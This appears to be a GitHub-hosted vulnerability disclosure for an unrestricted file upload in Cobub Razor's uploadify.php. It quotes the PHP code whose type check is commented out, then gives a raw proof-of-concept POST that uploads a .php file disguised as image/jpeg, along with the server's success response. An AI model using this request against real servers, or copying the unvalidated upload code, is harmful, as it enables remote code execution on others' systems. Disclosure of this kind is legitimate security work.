Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
64 lines (50 sloc) 2.13 KB

Vulnerability: Cobub Razor file upload

Detail:

/web/assets/swf/uploadify.php Line 26: Determine whether $_FILES is empty->Get the document root directory+folder+name->upload file. File type is not restricted.

    if (!empty($_FILES)) {
    	$tempFile = $_FILES['Filedata']['tmp_name'];
    	$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    	$targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    	
    	// $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    	// $fileTypes  = str_replace(';','|',$fileTypes);
    	// $typesArray = split('\|',$fileTypes);
    	// $fileParts  = pathinfo($_FILES['Filedata']['name']);
    	
    	// if (in_array($fileParts['extension'],$typesArray)) {
    		// Uncomment the following line if you want to make the directory if it doesn't exist
    		// mkdir(str_replace('//','/',$targetPath), 0755, true);
    		
    		move_uploaded_file($tempFile,$targetFile);
    		echo $targetFile;

POC:

Construct an upload POST:

    POST /razor/web/assets/swf/uploadify.php?folder=/razor/web/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------18467633426500
    Content-Length: 213
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------18467633426500
    Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
    Content-Type: image/jpeg
    
    <?php phpinfo();?>
    -----------------------------18467633426500

Upload success:

    HTTP/1.1 200 OK
    Date: Fri, 29 Mar 2019 04:33:23 GMT
    Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
    X-Powered-By: PHP/5.6.27
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 57
    
    D:/***/***/WWW/razor/web/phpinfo.php

result

You can’t perform that action at this time.